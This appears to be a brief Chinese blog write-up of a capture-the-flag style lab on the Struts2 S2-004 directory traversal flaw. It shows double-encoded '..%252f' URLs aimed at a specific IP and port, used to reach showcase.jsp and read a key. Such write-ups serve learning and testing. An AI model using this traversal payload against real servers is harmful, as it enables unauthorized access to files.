【Struts2-命令-目录遍历漏洞】S2-004
s2-004为目录遍历漏洞,可以通过../转到上级目录
将/二次编码为%252f
访问url:http://219.153.49.228:45437/struts/..%252f
不断向上级跳转,直到发现showcase.jsp
查看源码获得key
http://219.153.49.228:45437/struts/..%252f..%252f..%252f..%252f..%252f..%252fshowcase.jsp
https://www.cnblogs.com/ssan/
浙公网安备 33010602011771号